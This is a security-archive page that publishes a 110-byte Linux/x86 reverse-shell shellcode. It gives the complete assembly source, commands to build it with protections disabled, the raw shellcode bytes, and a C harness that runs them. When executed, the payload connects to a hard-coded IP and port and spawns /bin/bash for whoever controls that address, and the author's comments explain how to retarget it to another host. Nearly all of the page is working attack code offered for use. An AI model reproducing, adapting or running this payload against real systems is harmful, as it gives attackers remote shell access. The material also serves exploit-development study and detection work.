all things security

Linux/x86 Reverse Shell Shellcode

Linux/x86 Reverse Shell Shellcode
Posted Mar 25, 2017
Authored by Jasmin Landry

110 bytes small Linux/x86 reverse /bin/bash shellcode.

tags | x86, shellcode, bash
systems | linux
MD5 | 0e7869fb8d1ece6d37ef0b67c4938da1

Linux/x86 Reverse Shell Shellcode

Change Mirror Download
/*
; File name: reversebash.nasm
; Author: Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2

global _start

section .text
_start:
jmp short call_shellcode

shellcode:
xor eax, eax
xor ebx, ebx
xor ecx, ecx

pop edx

push 0x6
push 0x1
push 0x2

mov al, 0x66
mov bl, 0x1
mov ecx, esp
int 0x80

mov esi, eax

xor eax, eax
push eax
push dword [edx+2]
push word [edx]
push word 0x2
mov ecx, esp
push 0x10
push ecx
push esi
mov al, 0x66
mov bl, 0x3
mov ecx, esp
int 0x80

xor ecx, ecx
mov cl, 0x3

loop:
dec cl
mov al, 0x3f
mov ebx, esi
int 0x80

mov esi, eax
jnz loop

xor eax, eax
xor ecx, ecx
push ecx
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp
push ecx
push ebx
mov al, 0xb
mov ecx, esp
xor edx, edx
int 0x80

call_shellcode:
call shellcode
port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.

*/


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    2 Files
  • 23
    Oct 23rd
    16 Files
  • 24
    Oct 24th
    4 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close